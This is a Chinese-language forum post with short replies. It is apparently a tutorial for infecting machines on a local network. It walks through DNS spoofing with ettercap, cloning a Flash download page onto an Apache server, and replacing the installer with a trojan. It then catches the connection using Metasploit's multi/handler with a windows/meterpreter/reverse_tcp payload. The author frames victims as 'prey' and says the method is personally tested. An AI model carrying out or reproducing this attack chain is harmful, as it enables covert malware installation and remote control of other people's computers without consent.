找回密码
 立即注册

QQ登录

只需一步,快速开始

kali局域网渗透, 的确,按我知道的来 安装木马最简单.木马安装谁都会 ,谁也都有木马,但是怎么安装到局域网目标主机呢? 这才是最难的.
我看了本网站的教程啊 ,把安装木马到受控端这一步省略了,那这个教程将毫无意义.

接下来我来告诉大家 怎么让受控端自己主动安装并运行
在局域网内进行dns欺骗 让目标主机访问自己搭好的网站 下载我们生成的木马 运行 获得权限
怎么进行dns欺骗呢  不会的我教你 我们会用ettercap
ettercap玩kali的应该都知道 功能非常强大(bettercap也可以 但是ettercap简单 一行代码解决)
kali集成ettercap  但需要运行前配置一下 怎么配置我就不说了 百度一堆教程 直接干
后面///代表dns欺骗局域网内所以主机(包括自己的)  /目标主机ip// /网管ip// 不习惯用图形界面(麻烦)
forum.jpg

接下来就是配置网站页面了 我用的是flesh官网的页面

forum.jpg
网页可以用kali集成的工具克隆网站 我感觉httrack好用  也可以在浏览器上自己保存网页 方法很多
把网页放到/var/www/html目录下  然后输入/etc/init.d/apache2 start 启动apache服务
这样之后局域网内会被dns欺骗 访问的网站会变成我们自己搭建的网站 最后把flesh的安装包改成自己的木马就ok了

然后msfconsole启动
use exploit/multi/handler 模块

forum.jpg


设置一下payload载荷
set payload windows/meterpreter/reverse_tcp

forum.jpg


我就不设置监听ip和端口了 步骤大家也都会 直接run

forum.jpg






最后就是等待猎物了
时间问题就不演示了  亲测有效




记住我的id 404
2020-01-19 07-52-58 的屏幕截图.png
2020-01-19 07-49-38 的屏幕截图.png
2020-01-19 07-54-56 的屏幕截图.png
2020-01-19 08-14-47 的屏幕截图.png
2020-01-19 08-15-00 的屏幕截图.png
2020-01-19 08-15-46 的屏幕截图.png
分享至 : QQ空间
收藏

3 个回复

倒序浏览
可惜我一点没有玩转
回复 使用道具 举报
感谢分享
回复 使用道具 举报
感谢分享
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 立即注册